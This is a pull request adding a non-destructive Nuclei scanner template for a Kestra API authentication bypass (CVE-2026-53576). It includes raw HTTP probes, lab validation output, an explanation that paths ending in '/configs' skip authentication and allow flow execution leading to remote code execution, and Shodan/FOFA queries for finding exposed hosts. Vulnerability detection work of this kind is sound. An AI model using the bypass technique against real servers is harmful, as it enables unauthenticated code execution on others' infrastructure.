### PR TITLE
Create CVE-2026-53576.yaml

### DIFF
--- a/http/cves/2026/CVE-2026-53576.yaml
+++ b/http/cves/2026/CVE-2026-53576.yaml
@@ -1,0 +1,66 @@
+id: CVE-2026-53576
+
+info:
+  name: Kestra <= 1.3.20 - Authentication Bypass
+  author: aryu-ru
+  severity: critical
+  description: |
+    Kestra before 1.0.45 and from 1.1.0 through 1.3.20 contains an authentication bypass in the API authentication filter. The filter skips credential validation for any request whose path ends in "/configs", allowing an unauthenticated attacker to reach protected API endpoints - including flow creation and execution - by using "configs" as the namespace and flow identifier, which can lead to remote code execution.
+  impact: |
+    Unauthenticated attackers can create and execute arbitrary flows containing Shell or Process tasks, resulting in remote code execution on the Kestra server and potential compromise of connected infrastructure.
+  remediation: |
+    Upgrade to Kestra 1.0.45, 1.3.21, or later.
+  reference:
+    - https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53576
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2026-53576
+    cwe-id: CWE-288
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: kestra
+    product: kestra
+    shodan-query: http.title:"Kestra"
+    fofa-query: body="KESTRA_UI_PATH"
+  tags: cve,cve2026,kestra,auth-bypass,rce,unauth
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /api/v1/main/flows/other HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-yaml
+
+        invalid: [
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 401'
+        internal: true
+
+  - raw:
+      - |
+        POST /api/v1/main/flows/configs HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-yaml
+
+        invalid: [
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Illegal genericflow source"
+          - "io.kestra.core.models.flows.GenericFlow"
+        condition: and
+
+      - type: status
+        status:
+          - 422


### PR DESCRIPTION
### PR Information

- Added **CVE-2026-53576** — Kestra `<= 1.3.20` Authentication Bypass (`http/cves/2026/CVE-2026-53576.yaml`)
- Kestra's API authentication filter skips credential validation for any request whose path ends in `/configs` (`request.getPath().endsWith("/configs")`). An unauthenticated attacker can reach protected endpoints such as flow creation and execution by using `configs` as the namespace and flow identifier, which can lead to remote code execution as the worker user. Affected: `< 1.0.45` and `1.1.0`–`1.3.20`; fixed in `1.0.45` / `1.3.21`.
- The template is **non-destructive** — it never creates or runs a flow. It sends an intentionally invalid flow body to the `/configs` creation endpoint and matches the validation error that is only produced once the auth filter has been bypassed, gated by a control request to a non-`/configs` path that must return `401`. This ensures it does not fire on unauthenticated/open or non-Kestra hosts (there is no auth boundary to bypass), nor on patched builds.
- References:
  - https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
  - https://nvd.nist.gov/vuln/detail/CVE-2026-53576

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive) — `kestra/kestra:v1.3.20`, basic-auth enabled
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive) — `kestra/kestra:v1.3.21`, basic-auth enabled

#### Additional Details

Lab (single-container standalone, H2, basic-auth enabled):

```
docker run -d --network host --user=root \
  -v $PWD/application.yaml:/etc/config/application.yaml \
  kestra/kestra:v1.3.20 server standalone --config /etc/config/application.yaml
```

**True Positive — `kestra/kestra:v1.3.20`:**

```
$ nuclei -t http/cves/2026/CVE-2026-53576.yaml -u http://localhost:8080 -debug

[req 1] POST /api/v1/main/flows/other    -> HTTP 401 Unauthorized   (control: auth is enforced)
[req 2] POST /api/v1/main/flows/configs  -> HTTP 422 Invalid entity
        {"message":"Invalid entity: Illegal genericflow source: YAML parsing error ...
         (through reference chain: io.kestra.core.models.flows.GenericFlow[\"invalid\"])" ...}

[CVE-2026-53576] [http] [critical] http://localhost:8080/api/v1/main/flows/configs
Scan completed. 2 matches found.
```

The `/configs`-suffixed request reaches the flow controller (HTTP 422 validation error) with no credentials, while an identical request to a non-`/configs` path returns `401` — proving the authentication bypass.

**True Negative — `kestra/kestra:v1.3.21` (patched):**

```
$ nuclei -t http/cves/2026/CVE-2026-53576.yaml -u http://localhost:8080
Scan completed. 0 matches found.
```

On the patched build both paths return `401` (bypass closed), so the template does not match.

Discovery queries:
- Shodan: `http.title:"Kestra"`
- FOFA: `body="KESTRA_UI_PATH"`

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
